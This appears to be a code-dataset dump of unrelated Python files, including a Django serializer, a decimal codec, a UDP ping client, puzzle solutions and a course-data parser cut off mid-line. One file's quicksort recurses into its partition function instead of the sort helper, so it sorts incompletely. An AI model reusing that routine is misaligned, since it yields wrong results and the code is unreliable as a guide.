self.env[\"wecom.service_api_list\"].get_server_api_call(\n \"GET_API_DOMAIN_IP\"\n ),\n {},\n )\n if response[\"errcode\"] == 0:\n ir_config.sudo().set_param(\"wecom.api_domain_ip\", response[\"ip_list\"])\n\n except ApiException as ex:\n return self.env[\"wecomapi.tools.action\"].ApiExceptionDialog(\n ex, raise_exception=True\n )\n\n finally:\n if debug:\n _logger.info(\n _(\"End obtaining enterprise wechat API domain name IP segment\")\n )\n\n","repo_name":"rainbow-studio-solution/wecom","sub_path":"wecom_contacts/models/res_config_settings.py","file_name":"res_config_settings.py","file_ext":"py","file_size_in_byte":9233,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"35"} +{"seq_id":"27896126597","text":"from django_countries.fields import CountryField\nfrom rest_framework import serializers\nfrom .models import CarDealer\nfrom djangoTask.src.apps.Car.serializers import CarSerializer, SpecificationCarSerializer\n\n\nclass CarDealerSerializer(serializers.ModelSerializer):\n car_price = serializers.SerializerMethodField()\n car_price_with_discount = serializers.SerializerMethodField()\n count = serializers.SerializerMethodField()\n country = CountryField()\n cars = CarSerializer(many=True, required=False)\n specification = SpecificationCarSerializer(many=True, required=False)\n\n def get_car_price(self, obj):\n supplier_cars = obj.cardealercar_set.all()\n return {car.car_id: car.price for car in supplier_cars}\n\n def get_car_price_with_discount(self, obj):\n car_dealer_cars = obj.cardealercar_set.all()\n return {car.car_id: car.price_with_discount for car in car_dealer_cars}\n\n def get_count(self, obj):\n car_dealer_cars = obj.cardealercar_set.all()\n return {car.car_id: car.count for car in car_dealer_cars}\n\n class Meta:\n model = CarDealer\n fields = [\n \"id\",\n \"dealer_name\",\n \"country\",\n \"balance\",\n \"cars\",\n \"car_price\",\n \"car_price_with_discount\",\n \"count\",\n \"specification\",\n ]\n read_only_fields = [\n 'balance',\n 'cars'\n ]\n","repo_name":"Timofey1488/Django-Cars","sub_path":"djangoTask/src/apps/CarDealer/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36078278081","text":"import matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport matplotlib.colors as colors\nimport math\nimport xlrd\nimport pylab\nimport pypinyin\nimport itchat\nimport time, sys\nfrom itchat.content import TEXT\nfrom xlrd import open_workbook\nfrom matplotlib.font_manager import FontProperties\nwb1 = open_workbook('D:\\Krust\\Appone\\yunjiao.xlsx')\nsta={'2押':0}\nwb3 = open('D:\\Krust\\Appone\\geci.txt')\nwb = open_workbook('D:\\Krust\\Appone\\yanse.xlsx')\ncolor=[]\ncolornumber=20\ndef Yunjiao(a):\n global sta\n global color\n global colornumber\n global wb3\n global wb1\n global wb\n Tempt=pypinyin.pinyin(a, style=pypinyin.NORMAL)\n tempt=str(Tempt[0][0])\n ans=''\n if tempt=='a' or tempt=='o' or tempt=='e' or tempt=='ai' or tempt=='ei' or tempt=='ao' or tempt=='ou' or tempt=='ei' or tempt=='an' or tempt=='en' or tempt=='ang' or tempt=='eng' :\n ans=tempt[:]\n elif tempt=='yu' or tempt=='qu' or tempt=='ju' or tempt=='xu':\n ans='uu'\n elif tempt=='yue' or tempt=='que' or tempt=='jue' or tempt=='xue':\n ans='ue'\n elif tempt=='yun' or tempt=='qun' or tempt=='jun' or tempt=='xun':\n ans='uun'\n elif tempt=='ye':\n ans='ie'\n elif tempt[0]=='z'or tempt[0]=='c' or tempt[0]=='s':\n if len(tempt)>1 and tempt[1]=='h':\n ans=tempt[2:len(tempt)]\n if ans=='':\n ans=tempt[1:len(tempt)]\n for i in range(36):\n for ss in wb1.sheets():\n if ans==ss.cell(i,0).value:\n return int(ss.cell(i,1).value)-1\n return int(0)\ndef Multimortgage():\n global sta\n global color\n global colornumber\n global wb3\n global wb1\n global wb\n while True:\n line=wb3.readline()\n if line=='\\n':\n continue\n if not line:\n break\n #if line[len(line)-1]=='\\n':\n #line=line[0:len(line)-1]\n for i in range(len(line)):\n for s in wb.sheets():\n if line[i]=='\\n' :\n color.append(-2)\n elif line[i] > '\\u9fa5' or '\\u4e00' > line[i] or line[i]==' ':\n color.append(-1)\n else:\n color.append(Yunjiao(line[i]))\n #print(color)\n color.reverse()\n for i in range(len(color)):\n if color[i]<0:\n continue\n maxx=-1\n no=0\n for j in range(i+1,len(color)):\n if color[j]==-2:\n no=no+1\n if no>1:\n break\n continue\n if color[j]==-1:\n continue\n if color[i]==color[j]:\n tempt=0\n while True:\n if i+tempt>=len(color) or j+tempt>=len(color) or color[i+tempt]!=color[j+tempt] or i+tempt>=j or color[i+tempt]==-2 or color[j+tempt]==-2:\n break\n tempt+=1\n if tempt >=2:\n #print(i,j,tempt)\n no=no-1\n for p in range(tempt):\n if color[i]>18:\n color[j+p]=color[i]\n else:\n color[j+p]=int(colornumber)\n if maxx1:\n name=str(maxx)+'押'\n if name in sta.keys():\n sta[name]+=1\n else:\n sta[name]=1\n if color[i]<=18:\n for u in range(maxx):\n color[u+i]=int(colornumber)\n colornumber+=1\n color.reverse()\ndef yunjiao():\n global sta\n global color\n global colornumber\n global wb3\n global wb1\n global wb\n fig = plt.figure()\n ax = fig.add_subplot(111)\n startposx=0.0\n startposy=0.87\n filenum=0\n font1=FontProperties(fname='D:\\Krust\\Appone\\SimHei.ttf',size=15)\n words=0\n Multimortgage()\n #print(color)\n wb3.close()\n wb3 = open('D:\\Krust\\Appone\\geci.txt')\n while True:\n line=wb3.readline()\n if not line:\n break\n if line=='\\n':\n continue\n for i in range(len(line)):\n if line[i]=='\\n':\n words+=1\n continue\n elif line[i] > '\\u9fa5' or '\\u4e00' > line[i]:\n pylab.text(startposx+0.008,startposy+0.009, line[i], fontsize=10 ,fontproperties=font1, fontweight='bold', color='black', horizontalalignment='center')\n startposx+=0.02\n if startposx>1.0:\n startposx=0\n startposy-=0.10\n if startposy<0.05:\n pylab.savefig(\"heart3-1\"+str(filenum)+\".png\")\n filenum+=1\n fig = plt.figure()\n ax = fig.add_subplot(111)\n startposx=0.0\n startposy=0.87\n words+=1\n continue\n for s in wb.sheets():\n c=s.cell(int(color[words]),0).value\n words+=1\n pos = (startposx, startposy)\n ax.add_patch(patches.Rectangle(pos, 0.05, 0.07, color=c))\n ax.annotate('', xy=pos)\n pylab.text(startposx+0.025,startposy+0.009, line[i], fontsize=10 ,fontproperties=font1, fontweight='bold', color='black', horizontalalignment='center')\n startposx+=0.05\n if startposx>1.0:\n startposx=0\n startposy-=0.10\n if startposy<0.05:\n pylab.axis('off')\n pylab.savefig(\"heart3-1\"+str(filenum)+\".png\")\n filenum+=1\n fig = plt.figure()\n ax = fig.add_subplot(111)\n startposx=0.0\n startposy=0.87\n startposx=0\n startposy-=0.09\n if startposy<0.05:\n pylab.axis('off')\n pylab.savefig(\"colored_lyrics\"+str(filenum)+\".png\")\n filenum+=1\n fig = plt.figure()\n ax = fig.add_subplot(111)\n startposx=0.0\n startposy=0.87\n pylab.axis('off')\n pylab.savefig(\"colored_lyrics\"+str(filenum)+\".png\")\n filenum+=1\n fig = plt.figure()\n ax = fig.add_subplot(111)\n startpos=0.7\n for keys in sta:\n pylab.text(0.5,startpos, keys+':'+str(sta[keys]), fontsize=10 ,fontproperties=font1, fontweight='bold', color='black', horizontalalignment='center')\n startpos-=0.2\n pylab.axis('off')\n pylab.savefig(\"colored_lyrics\"+str(filenum)+\".png\")\n return int(filenum)\n #plt.show()\n","repo_name":"Stanliuu/Krust1","sub_path":"Appone/yunjiaojiancha.py","file_name":"yunjiaojiancha.py","file_ext":"py","file_size_in_byte":6962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2296491431","text":"# Codec for python decimal.Decimal to arbitrary-precision value-and-exponent encoding.\n\nimport decimal\n\nfrom six import int2byte\n\nfrom b3.type_varint import encode_uvarint, decode_uvarint\nfrom b3.utils import IntByteAt\n\n########################################################################################################################\n# Data Format Standard\n########################################################################################################################\n\n# Goal: \"small numbers are small, big numbers are big\"\n# We call the non-exponent 'main number' the 'value'. Others call it the signficand or (sometimes wrongly-ish) mantissa.\n\n# --- Structure ---\n# [Control byte][optional exponent uvarint][value uvarint]\n# Note: the value varint is allowed to be missing if its zero. We dont have a presence flag for that,\n# so the decoder uses the size of what it's given (via end-index) to determine presence.\n\n# --- Control Byte ---\n# +------------+------------+------------+------------+------------+------------+------------+------------+\n# | 0:Number | Sign | Expo Sign | Ext exp(1) | exponent | exponent | exponent | exponent |\n# | 1:Special | Sign | Nan/Inf(2) | q/s nan(3) | unused | unused | unused | unused |\n# +------------+------------+------------+------------+------------+------------+------------+------------+\n# (1) 0 = exponent in bottom 4 bits, 1 = exponent varint follows\n# (2) 0 = NaN, 1 = Infinity\n# (3) 0 = 'Quiet' NaN, 1 = 'Signalling' NaN\nBIT_SPECIAL = 0x80 # 0 = Number, 1 = special\nBIT_NEGATIVE = 0x40 # 0 = +ve number, 1 = -ve number\nBIT_EXP_NEGA = 0x20 # 0 = +ve exponent, 1 = -ve exponent\nBIT_INFINITY = 0x20 # 0 = NaN, 1 = Infinit\nBIT_EXP_EXT = 0x10 # 0 = exponent is lower 4 bits of control byte, 1 = exponent is a uvarint following control byte\nBIT_SNAN = 0x10 # 0 = Quiet NaN, 1 = 'Signalling' NaN\nEXPONENT_BITS = 0x0F # Lower 4 bits of control byte\n\n# https://www.jpl.nasa.gov/edu/news/2016/3/16/how-many-decimals-of-pi-do-we-really-need/\n# @ 15dp, \"voyager 1 distance-radius circle circumference error is 1.5 inches\"\n\n\n########################################################################################################################\n# Encode\n########################################################################################################################\n\n# Note: we're not supporting compact zero-value mode in the encoder. CZV is optional for encoders so that's ok.\n\n# In: num - a decimal.Decimal type ONLY\n# Out: bytes\ndef encode_decimal(num):\n if not isinstance(num, decimal.Decimal):\n raise TypeError(\"only accepts decimal.Decimal objects\")\n\n sign, digits, exp = num.as_tuple()\n special = not num.is_finite()\n\n # --- Control bits & special values (inf, nan) ---\n bits = 0x00\n if special: # bit 4 (0x80) : 0=number, 1=special\n bits |= BIT_SPECIAL\n\n if sign: # bit 3 (0x40) : 0=+ve number, 1=-ve number\n bits |= BIT_NEGATIVE\n\n if special: # bit 2 (0x20) : [special] 0=nan 1=infinity\n if num.is_infinite():\n bits |= BIT_INFINITY\n else: # bit 2 (0x20) : [number] 0=+ve expo 1=-ve expo\n if exp < 0:\n bits |= BIT_EXP_NEGA\n\n if special: # bit 1 (0x10) : [special] 0=qnan 1=snan\n if num.is_snan():\n bits |= BIT_SNAN\n return int2byte(bits) # *** Special only, we're done ***\n\n # --- Exponent ---\n exp_abs = abs(exp)\n\n if exp_abs > 0x0F: # bit 1 (0x10) : [number] 0=expo bottom-4bits 1=expo varint follows\n bits |= 0x10 # exponent > 15, store it in varint\n out = [int2byte(bits), encode_uvarint(exp_abs)]\n # ^^ uv b/c exp sign already done & we're trying to be compact\n else: # exponent =< 15, store it in low nibble\n bits |= exp_abs & 0x0F\n out = [int2byte(bits)]\n\n # --- Value (significand) ---\n if digits:\n value = int(\"\".join(map(str, digits))) # [screaming intensifies]\n if value: # Note that 0 = no value bytes at all.\n out.append(encode_uvarint(value))\n\n return b\"\".join(out)\n\n\n########################################################################################################################\n# Decode\n########################################################################################################################\n\n# In: bytes buffer, index of our start, index of next thing's start (so index of us + size of us)\n# Out: a decimal.Decimal\ndef decode_decimal(buf, index, end):\n bits, index = IntByteAt(buf, index)\n\n # --- Special literals ---\n if bits & BIT_SPECIAL:\n if bits & BIT_INFINITY: # Is infinity, not a NaN\n lit = \"Inf\"\n else: # Is a NaN\n if bits & BIT_SNAN: # Is a Signalling NaN\n lit = \"sNaN\"\n else: # Is a Quiet NaN\n lit = \"NaN\"\n\n sign_lit = \"%s%s\" % (\"-\" if bits & BIT_NEGATIVE else \"\", lit)\n return decimal.Decimal(sign_lit)\n\n # --- exponent ---\n if bits & BIT_EXP_EXT: # exponent is a varint that follows\n exp, index = decode_uvarint(buf, index)\n else: # exponent is bottom half of bits byte\n exp = bits & EXPONENT_BITS\n\n # --- value ---\n if index == end: # Note: old behaviour, deprecated (handled by zero_value_table)\n value = 0\n else:\n value, index = decode_uvarint(buf, index)\n\n # Note: we cant get -0 through here if we use ints and scaleb, so using strings instead for now.\n\n dec_str = \"%s%de%s%d\" % (\n \"-\" if bits & BIT_NEGATIVE else \"\",\n value,\n \"-\" if bits & BIT_EXP_NEGA else \"\",\n exp,\n )\n # print(\"Dec str: %r\" % dec_str)\n return decimal.Decimal(dec_str)\n\n\n# decimal.Decimal(-1234).scaleb(-2) -> Decimal('-12.34') # using ints\n# decimal.Decimal('-1234e-2') -> Decimal('-12.34') # using strings\n","repo_name":"oddy/b3","sub_path":"b3/type_decimal.py","file_name":"type_decimal.py","file_ext":"py","file_size_in_byte":5886,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"39707749730","text":"import sqlite3\nimport os.path\n\nconnection = sqlite3.connect(os.path.abspath('database.db'))\nconnection.text_factory = str\n\nwith open(os.path.abspath('schema.sql')) as f:\n connection.executescript(f.read())\n \nconnection.commit()\nconnection.close()","repo_name":"yanaredkina/Website-project","sub_path":"init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5399519405","text":"from socket import *\nimport time\n\nserverName = '127.0.0.1'\nserverPort = 12000\nsocketClient = socket(AF_INET, SOCK_DGRAM)\nsocketClient.settimeout(1)\n\nfor i in range(0, 10):\n sendTime = time.time()\n message = ('Ping %d %s' % (i + 1, sendTime)).encode()\n try:\n socketClient.sendto(message, (serverName, serverPort))\n modifiedMessage, serverAddress = socketClient.recvfrom(1024)\n rtt = time.time() - sendTime\n print('Sequence %d: Reply from %s RTT = %.3fs' % (i+1, serverName, rtt))\n except Exception as e:\n print('Sequence %d timeout' % (i + 1))\nsocketClient.close()\n\n","repo_name":"Jocs/reading-notes","sub_path":"computer-networking-a-top-down-approach/cp2/ping_client.py","file_name":"ping_client.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"37487991403","text":"\n#Se hace la creación de la clase animal como model con sus respectivos atributos que tendra cada objeto de dicha clase para el zoológico\nclass Animal:\n def __init__(self, nombre = \"\", especieAnimal = \"\", dieta = \"\", temperatura = 0, id = 0, edad = 0, estadoSalud = 0, cantDormir = 0, cantComer = 0):\n self.nombre = nombre\n self.especieAnimal = especieAnimal\n self.dieta = dieta\n self.temperatura = temperatura\n self.id = id\n self.edad = edad\n self.estadoSalud = estadoSalud\n self.cantDormir = cantDormir\n self.cantComer = cantComer\n self.cantDormirTemporal = cantDormir\n self.cantComerTemporal = cantComer\n self.jugar = False\n\n #En este caso hacemos 2 atributos temporales que son comer y dormir que guardaran lo mismo que el cantComer y el cantDormir,\n #pero, estos temporales nos serviran para irle restando el numero y mostrarle al usuario cuanto le queda al animal,\n #y los otros dos son fijos para que no se pierda la información del objeto animal.","repo_name":"Jeysa30/ZoologicoMaravilla","sub_path":"models/Animal.py","file_name":"Animal.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21166190479","text":"import operator\n\nfrom Backend.Domain.TradingSystem.TypesPolicies.Purchase_Composites.purchase_leaves import PurchaseLeaf\nfrom Backend.response import Response\n\nops = {'great-than': operator.gt,\n 'less-than': operator.lt,\n 'great-equals': operator.ge,\n 'less-equals': operator.le,\n 'equals': operator.eq}\n\n\nclass UserLeafPurchaseRule(PurchaseLeaf):\n\n def __init__(self, leaf_details: dict, parent=None):\n super().__init__(leaf_details, parent)\n\n def operation(self, products_to_quantities: dict, user_age: int):\n if ops[self._comparator](user_age, self._constraint):\n return Response(True, msg=\"Purchase is permitted!\")\n return Response(False,msg=\"Purchase is not permitted!\")\n\n\nclass ProductLeafPurchaseRule(PurchaseLeaf):\n\n def __init__(self, leaf_details: dict, parent=None):\n super().__init__(leaf_details, parent)\n\n def operation(self, products_to_quantities: dict, user_age: int):\n prod_id = self._context_id\n amount_of_prod = products_to_quantities.get(prod_id)[1]\n if ops[self._comparator](amount_of_prod, self._constraint):\n return Response(True, msg=\"Purchase is permitted!\")\n return Response(False, msg=\"Purchase is not permitted!\")\n\n\nclass CategoryLeafPurchaseRule(PurchaseLeaf):\n\n def __init__(self, leaf_details: dict, parent=None):\n super().__init__(leaf_details, parent)\n\n def operation(self, products_to_quantities: dict, user_age: int):\n category = self._context_id\n amount_of_category = 0\n for product_id,(product, quantity) in products_to_quantities.items():\n if product.get_category() == category:\n amount_of_category += quantity\n\n if ops[self._comparator](amount_of_category, self._constraint):\n return Response(True, msg=\"Purchase is permitted!\")\n return Response(False, msg=\"Purchase is not permitted!\")\n\n\nclass BagLeafPurchaseRule(PurchaseLeaf):\n\n def __init__(self, leaf_details: dict, parent=None):\n super().__init__(leaf_details, parent)\n\n def operation(self, products_to_quantities: dict, user_age: int):\n cart_price = 0\n for _, (product, quantity) in products_to_quantities.items():\n cart_price += quantity * product.get_price()\n if ops[self._comparator](cart_price, self._constraint):\n return Response(True, msg=\"Purchase is permitted!\")\n return Response(False, msg=\"Purchase is not permitted!\")","repo_name":"RavidRo/TradingSystem","sub_path":"Backend/Domain/TradingSystem/TypesPolicies/Purchase_Composites/concrete_leaf.py","file_name":"concrete_leaf.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12101283188","text":"class Solution:\r\n def strangePrinter(self, s: str) -> int:\r\n n=len(s)\r\n if not s:\r\n return 0\r\n\r\n dp=[[sys.maxsize]*n for _ in range(n)]\r\n\r\n for i in range(n):\r\n dp[i][i]=1\r\n\r\n for l in range(2,n+1):\r\n for i in range(n-l+1):\r\n j=i+l-1\r\n dp[i][j]=dp[i+1][j]+1\r\n\r\n for k in range(i+1,j+1):\r\n if s[i]==s[k]:\r\n dp[i][j]=min(dp[i][j],dp[i][k-1]+(dp[k+1][j] if j>k else 0))\r\n\r\n return dp[0][n-1] ","repo_name":"MonitSharma/LeetCode-Solutions","sub_path":"664-Strange-printer/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"69982174180","text":"class TreeHouse:\n \"\"\"\n Main class based solution containing methods for solving Day Eight of the Advent of Code 2022.\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"\n Initializer for class level variables.\n \"\"\"\n self.length = None\n self.height = None\n self.grid_map = self.construct_data(\"input.txt\")\n self.set_grid_dimensions()\n\n @staticmethod\n def construct_data(file_name: str) -> list:\n \"\"\"\n Constructs the data set provided in `input.txt` into a list of section assignment pairs.\n\n :param file_name: The file name to read into memory.\n :return: A list containing the `assignment pairs` to be searched.\n \"\"\"\n with open(file_name, 'r') as file_object:\n data = [row.strip() for row in file_object.readlines()]\n grid_map = []\n\n for row in data:\n grid_map.append([eval(row) for row in [*row]])\n\n return grid_map\n\n def set_grid_dimensions(self) -> None:\n \"\"\"\n Sets the length and height of the `grid` for iteration.\n \"\"\"\n self.length = len(self.grid_map[0])\n self.height = len(self.grid_map)\n\n def is_boundary(self, row, column) -> bool:\n \"\"\"\n This method determines whether the current `pointer` location within the `grid` of tree heights is on the edge\n or boundary of the map.\n\n :return: A boolean true or false.\n \"\"\"\n return row == 0 or row == self.height - 1 or column == 0 or column == self.length - 1\n\n def is_taller(self, row: int, column: int, tree: int) -> bool:\n \"\"\"\n This method determines whether the supplied `tree` parameter is of a greater or equal value\n to the provided tree in the provided `row` and `column` of the `grid`.\n\n :return: A boolean true or false.\n \"\"\"\n return self.grid_map[row][column] >= tree\n\n def part_one_search(self) -> int:\n \"\"\"\n Searches the `grid` for all trees and determines their visibility by comparing the `height` of a given tree\n against all surrounding trees.\n\n :return: An integer corresponding to the total number of trees visible from outside the grid.\n \"\"\"\n visible_trees = 0 # Counter for the number of visible trees in the grid\n for row in range(self.height):\n for column in range(self.length):\n if self.is_boundary(row, column):\n visible_trees += 1\n continue\n\n tree = self.grid_map[row][column]\n\n for k in range(0, row): # Check north\n if self.is_taller(k, column, tree):\n break\n else:\n visible_trees += 1\n continue\n\n for k in range(row + 1, self.height): # Check south\n if self.is_taller(k, column, tree):\n break\n else:\n visible_trees += 1\n continue\n\n for k in range(0, column): # Check east\n if self.is_taller(row, k, tree):\n break\n else:\n visible_trees += 1\n continue\n\n for k in range(column + 1, self.length): # Check west\n if self.is_taller(row, k, tree):\n break\n else:\n visible_trees += 1\n continue\n\n return visible_trees\n\n def part_two_search(self) -> int:\n \"\"\"\n Searches for the highest `scenic score` possible for any given `tree` within the `grid` map of trees. A tree's\n `scenic score` is found by multiplying together its viewing distance in each of the four cardinal directions,\n e.g., `(north * south * east * west)`.\n\n :return: An integer corresponding to the maximum scenic score possible for any tree.\n \"\"\"\n scenic_score = 0 # Initialise the maximum scenic score\n\n for row in range(self.height): # Iterate over all the trees in the grid.\n for column in range(self.length):\n tree = self.grid_map[row][column] # Set the tree\n score = 1 # Initialise a score tracker\n counter = 0 # Initialise a counter variable\n\n for k in reversed(range(0, row)): # Check north\n counter += 1\n if self.grid_map[k][column] >= tree:\n break\n\n score *= counter # Multiply the score by the counter\n counter = 0 # Reset the counter\n\n for k in range(row + 1, self.height): # Check south\n counter += 1\n if self.grid_map[k][column] >= tree:\n break\n\n score *= counter # Multiply the score by the counter\n counter = 0 # Reset the counter\n\n for n in reversed(range(0, column)): # Check east\n counter += 1\n if self.grid_map[row][n] >= tree:\n break\n\n score *= counter # Multiply the score by the counter\n counter = 0 # Reset the counter\n\n for n in range(column + 1, self.length): # Check west\n counter += 1\n if self.grid_map[row][n] >= tree:\n break\n\n score *= counter # Multiply the score by the counter\n scenic_score = max(scenic_score, score) # Update the maximum scenic score\n\n return scenic_score\n\n def solve(self) -> None:\n \"\"\"\n Simple wrapper method to print results to the console.\n \"\"\"\n print(\"Part One (1):\", self.part_one_search())\n print(\"Part Two (2):\", self.part_two_search())\n\n\nif __name__ == \"__main__\":\n tree_house = TreeHouse()\n tree_house.solve()\n","repo_name":"jamestkelly/advent-of-code-2022","sub_path":"day-8-treetop-tree-house/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"71987796900","text":"# 首先用quick sort排好数组,如果存在出现次数超过一半的数字,\n# 它必在数组中间位置。直接取出中间位置的元素,遍历计算次数\n# 如果超过数组长度一半,则为此数字,否则返回0\nclass Solution:\n # quick sort\n def quickSort(self, alist):\n self.quickSortHelper(alist, 0, len(alist) - 1)\n def quickSortHelper(self, alist, first, last):\n if first < last:\n splitspot = self.partition(alist, first, last)\n self.partition(alist, first, splitspot - 1)\n self.partition(alist, splitspot + 1, last)\n \n def partition(self, alist, first, last):\n pivotvalue = alist[first]\n finished = False\n left = first + 1\n right = last\n while not finished:\n while left <= right and alist[left] <= pivotvalue:\n left += 1\n while left <= right and alist[right] >= pivotvalue:\n right -= 1\n if left > right:\n finished = True\n else:\n alist[left], alist[right] = alist[right], alist[left]\n alist[first], alist[right] = alist[right], alist[first]\n return right \n \n def findNum(self, alist):\n self.quickSort(alist)\n mid = len(alist) // 2\n count = 0\n for num in alist:\n if num == alist[mid]:\n count += 1\n return alist[mid] if count > len(alist) / 2 else 0\n\n# test\ntest = Solution()\nalist = [1, 2, 3, 2, 2, 2, 5, 4, 2]\nprint(test.findNum(alist))\nalist = [1, 2, 3, 2, 2, 2, 5, 4, 2, 6, 7, 8, 9]\nprint(test.findNum(alist))","repo_name":"EuniceF/InterviewAlgorithm","sub_path":"29.py","file_name":"29.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"332258811","text":"#!/usr/bin/env python\nimport sys\nimport csv\nimport time\nfrom datetime import datetime, timedelta\nfrom collections import defaultdict\nfrom operator import itemgetter\n\n# author: eronning\n# description: parses course information pulled from Brown API\n# and gives each course a data point for each\n# minute that it is in session and bucketed based on\n# the day of the week that it is offered. this data is then\n# cleaned of invalid times (times when the ratty is not open), \n# sorted and written to a csv file (course_data_cleaned.csv).\n\ndata_path = '../../data/course/course_data.csv'\n\n# get_time_object gets a time object\n# @param time is the seconds since midnight\n# @param day_of_week is the day of the week\n# @param semester is the semester and year\n# return a time object containing time of day,\n# day of the week and the semester\ndef get_time_object(time, day_of_week, semester):\n\thours = time / 3600;\n\tminutes = (time % 3600) / 60;\n\ttime_object = {\n\t\t\"hour\" : hours,\n\t\t\"minute\" : minutes,\n\t\t\"day_of_week\" : day_of_week,\n\t\t\"semester\" : semester\n\t}\n\treturn time_object\n\n# key_from_time gets a key from a time object\n# @param time_object is a object containing time information\n# return a key for that time object\ndef key_from_time(time_object):\n\treturn str(time_object[\"semester\"]) + ',' + str(days[time_object[\"day_of_week\"]]) + ',' + str(time_object[\"hour\"]) + ',' + str(time_object[\"minute\"])\n\n# mapping days to their day of the week (index format)\ndays = {\"M\": 0, \"T\": 1, \"W\": 2, \"R\": 3, \"F\": 4}\n\ndef main():\n\t'''\n\tFor CSV:\n\t'''\n\twith open(data_path) as f:\n\t\treader = csv.reader(f)\n\t\theader = next(reader)\n\t\tcourse_data = {}\n\t\tstarting_grouping = defaultdict(list)\n\t\tending_grouping = defaultdict(list)\n\t\tfor row in reader:\n\t\t\t# grab information at each row\n\t\t\tsemester = row[0]\n\t\t\tsize = int(row[6]) - int(row[5])\n\t\t\tday_of_week = row[8]\n\t\t\tstart_time = int(row[9])\n\t\t\tend_time = int(row[10])\n\t\t\t# get time objects\n\t\t\tstart_time_object = get_time_object(start_time, day_of_week, semester)\n\t\t\tend_time_object = get_time_object(end_time, day_of_week, semester)\n\t\t\t# fill a object with information of that course\n\t\t\tcourse_info = {\n\t\t\t\t'semester'\t : semester,\n\t\t\t\t'course' : row[3],\n\t\t\t\t'title' : row[4],\n\t\t\t\t'num_people' : size,\n\t\t\t\t'location' : row[7],\n\t\t\t\t'day_of_week' : day_of_week,\n\t\t\t\t'start_time' : start_time_object,\n\t\t\t\t'end_time' : end_time_object\n\t\t\t}\n\t\t\tif day_of_week in days:\n\t\t\t\tkey = key_from_time(start_time_object)\n\t\t\t\tif key in course_data:\n\t\t\t\t\t# perform logic here\n\t\t\t\t\tdate = course_data[key]\n\t\t\t\t\t# get the connecting time values\n\t\t\t\t\tstart_hr = int(start_time_object[\"hour\"])\n\t\t\t\t\tstart_min = int(start_time_object[\"minute\"])\n\t\t\t\t\t# get the disconnecting time values\n\t\t\t\t\tend_hr = int(end_time_object[\"hour\"])\n\t\t\t\t\tend_min = int(end_time_object[\"minute\"])\n\t\t\t\t\t# set the timeslots\n\t\t\t\t\ttimeslot_hr = start_hr\n\t\t\t\t\ttimeslot_min = start_min\n\t\t\t\t\t# fill the timeslots with a course until tht times meet\n\t\t\t\t\twhile timeslot_hr != end_hr or timeslot_min != end_min:\n\t\t\t\t\t\t# add the course to the current timeslot\n\t\t\t\t\t\tdate[str(timeslot_hr) + \":\" + str(timeslot_min)].append(course_info)\n\t\t\t\t\t\t# update hr and min times\n\t\t\t\t\t\tif timeslot_min == 59:\n\t\t\t\t\t\t\ttimeslot_min = 0\n\t\t\t\t\t\t\ttimeslot_hr += 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttimeslot_min += 1\n\t\t\t\telse:\n\t\t\t\t\tcourse_data[key] = defaultdict(list)\n\n\t\t# Clean information and write it to a csv\n\t\twith open('../../data/course/course_data_cleaned.csv', 'wb') as cf:\n\t\t\tcsv_writer = csv.writer(cf)\n\t\t\tcsv_writer.writerow(['semester', 'week_day', 'hour', 'minute', 'num_people'])\n\t\t\tcourse_time_data = defaultdict(list)\n\t\t\t# iterate through all days\n\t\t\tfor date in course_data:\n\t\t\t\tdate_data = date.split(\",\")\n\t\t\t\tday = course_data[date]\n\t\t\t\t# check if the day has any timeslots\n\t\t\t\tif day:\n\t\t\t\t\t# iterate through each timeslote\n\t\t\t\t\tfor timeslot in day:\n\t\t\t\t\t\ttimeslot_data = timeslot.split(\":\")\n\t\t\t\t\t\t# pulling out the num people \n\t\t\t\t\t\tnum_people = sum([data['num_people'] for data in day[timeslot]])\n\t\t\t\t\t\t# building a row for that timeslot\n\t\t\t\t\t\ttime = [date_data[0], date_data[1], int(timeslot_data[0]), int(timeslot_data[1]), int(num_people)]\n\t\t\t\t\t\tcourse_timeslot_key = date_data[0] + ',' + date_data[1] + ',' + timeslot_data[0] + ',' + timeslot_data[1]\n\t\t\t\t\t\t# add data to map for combination\n\t\t\t\t\t\tcourse_timeslot = course_time_data[course_timeslot_key]\n\t\t\t\t\t\ttimeslot_hour = int(timeslot_data[0])\n\t\t\t\t\t\ttimeslot_min = int(timeslot_data[1])\n\t\t\t\t\t\tif not ((0 <= timeslot_hour <= 7) or (19 < timeslot_hour <= 23) or (timeslot_hour == 7 and timeslot_min > 30)):\n\t\t\t\t\t\t\tcourse_timeslot.append(time)\n\t\t\t\t\t\tcourse_time_data[course_timeslot_key] = course_timeslot\n\n\n\t\t\tcombined_course_data = []\n\t\t\t# combine same timeslots\n\t\t\tfor timeslot in course_time_data:\n\t\t\t\tdata = course_time_data[timeslot]\n\t\t\t\tif data:\n\t\t\t\t\tnum_people = sum([d[4] for d in data])\n\t\t\t\t\treference = data[0]\n\t\t\t\t\tcombined_time = 